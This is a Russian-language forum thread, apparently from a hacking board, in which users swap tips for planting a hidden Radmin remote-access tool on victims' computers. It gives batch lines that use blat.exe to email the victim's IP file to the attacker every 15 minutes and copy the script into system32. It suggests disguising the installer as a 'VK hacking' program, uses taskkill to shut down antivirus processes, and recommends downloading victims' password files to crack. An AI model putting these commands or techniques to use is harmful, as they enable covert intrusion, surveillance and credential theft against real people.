Для дурачков , вот человек написал готовый скрытый радмин всё в одном флаконе ! http://forum.antichat.ru/threadnav101461-1-10.html
если тема ешо актуална для тех которие не разобрались с отсиланиам почты в етои строке убираити вконтсе точку Code: blat.exe %systemroot%/system32/ip.txt -to вашапочта@yandex.ru. + делаити фаил ip.bat с вашаи сторчкой ( с вашаи почтаи на которую будит отсилат ) прописиваити ево в install.bat Code: copy /y "ip.bat" "%SYSTEMROOT%/system32/ip.bat" тогда вам на почту каждие 15 минут будит приходит ip
Чтобы не было так паливно,можно прописать в install.bat удаление самого архива и запуск какой-нибудь проги,установщик которой вы добавите в архив,например "Взлом_Вконтакте.exe" Подскажите плиз, что прописать в батнике, чтобы удалился сам SFX архив. Спасибо.
Народ, так кто нибудь подскажет, что прописать в батнике, что бы после распаковки SFX архива этот же архив удалился?
Ребят не подскажите как мне узнать пароль от его мыла ? Короче закинул я жертве скрытый Radmin приконектился хотел закинуть трояна через радмин но начал закидывать там антивирус закричал как мне через телнет его выключить ? у него стоит антивирус Sumantec AntiVirus
узнай под каким именем Sumantec AntiVirus в диспетчере задач в процессах отоброжается и сделай так: taskkill /f /im название_процесса.exe я закрывал нод 32 так: taskkill /f /im egui.exe
Нелегче ли тебе скачать файлы с паролями и у себя их расшифровать. Антивирусы просто так не вырубишь.
Подскажите пожалуйста ньюбу, чем запаковать это всё великолепие в .exe файл... Много гуглил... как то туго для меня это даётся... Пробовал nBinder Limited но он что-то не хочет работать у меня : \
дайте батник плиз, который отсылает ip жертвы на мыло, желательно с таймерои, чтобы каждые пять минут присылал очень нужно